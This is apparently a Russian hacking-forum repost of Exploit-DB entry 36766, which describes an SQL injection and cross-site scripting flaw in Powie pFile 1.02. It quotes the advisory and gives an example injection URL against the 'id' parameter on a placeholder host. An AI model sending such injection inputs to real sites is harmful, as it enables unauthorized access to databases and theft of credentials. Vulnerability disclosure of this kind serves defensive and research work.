file.php?id' SQL Injection

Автор темы Exploiter
Дата начала 21 Дек 2022
Просмотров 406 Просмотров

JavaScript отключён. Чтобы полноценно использовать наш сайт, включите JavaScript в своём браузере.

Exploiter

Хакер

21 Дек 2022

EDB-ID: 36766

Проверка EDB

Пройдено

Автор: INDOUSHKA

Тип уязвимости: WEBAPPS

Платформа: PHP

CVE: cve-2012-1210

Дата публикации: 2012-02-13

Powie pFile 1.02 - '/pfile/file.php?id' SQL Injection

Код:

source: https://www.securityfocus.com/bid/51982/info
 
pfile is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
pfile 1.02 is vulnerable; other versions may also be affected. 

http://www.example.com/pfile/file.php?eintrag=0&filecat=0&id=%24%7[xql]

Источник: www.exploit-db.com

Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploit Powie pFile 1.02 - '/pfile/kommentar.php?filecat' Cross-Site Scripting

Ответы: 0

Просмотры: 413

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Exploit Powie PForum 1.1x - 'Username' Cross-Site Scripting

Ответы: 0

Просмотры: 327

Эксплойты & Уязвимости 21 Дек 2022

Exploiter

Сверху Снизу

Привет, Друг. Твои права на форуме ограничены! Зарегистрируйся или Войди на форум, чтобы снять ограничение.